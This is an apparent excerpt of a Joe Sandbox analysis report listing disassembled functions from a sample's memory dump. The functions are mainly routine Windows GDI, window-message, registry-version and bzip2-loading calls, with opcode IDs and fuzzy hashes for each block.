                                                                              • 6F530860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$C400C740F530860F532980
                                                                              • String ID:
                                                                              • API String ID: 209721339-0
                                                                              • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                              • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                              • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                              • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                              • API String ID: 47109696-2530820420
                                                                              • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                              • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                              • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                              • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                              APIs
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$Delete$Stretch
                                                                              • String ID:
                                                                              • API String ID: 1458357782-0
                                                                              • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                              • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                              • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                              • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                              • 73A1A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                              Strings
                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                              • API String ID: 1435929781-222967699
                                                                              • Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                              • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                              • Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                              • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 004233BF
                                                                              • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                              • SetCursor.USER32(00000000), ref: 00423423
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                              • String ID:
                                                                              • API String ID: 1770779139-0
                                                                              • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                              • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                              • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                              • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                              • API String ID: 667068680-2254406584
                                                                              • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                              • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                              • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                              • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                              APIs
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                              • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                              • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                              • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                              • API String ID: 2573145106-911929905
                                                                              • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                              • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                              • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                              • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompress), ref: 0045CDC1
                                                                              • GetProcAddress.KERNEL32(030E0000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                              • API String ID: 190572456-212574377
                                                                              • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                              • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                              • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                              • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                              • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                              • API String ID: 142928637-2676053874
                                                                              • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                              • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                              • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                              • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                              • API String ID: 667068680-222143506
                                                                              • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                              • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                              • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                              • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B755
                                                                              • 73A1A570.USER32(?), ref: 0041B761
                                                                              • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                              • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                              • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A18830$A122A26310A570Focus
                                                                              • String ID:
                                                                              • API String ID: 3906783838-0
                                                                              • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                              • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                              • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                              • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041BA27
                                                                              • 73A1A570.USER32(?), ref: 0041BA33
                                                                              • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                              • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                              • 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A18830$A122A26310A570Focus
                                                                              • String ID:
                                                                              • API String ID: 3906783838-0
                                                                              • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                              • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                              • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                              • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B58E
                                                                              • 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                              • 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                              • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                              • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                              • 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: E680$A24620A480A570Focus
                                                                              • String ID:
                                                                              • API String ID: 3709697839-0
                                                                              • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                              • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                              • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                              • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                              APIs
                                                                              • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                              • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                              • API String ID: 1452528299-1580325520
                                                                              • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                              • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                              • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                              • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                              • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                              • 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                              • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                              • 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A24620MetricsSystem$A480A570
                                                                              • String ID:
                                                                              • API String ID: 4042297458-0
                                                                              • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
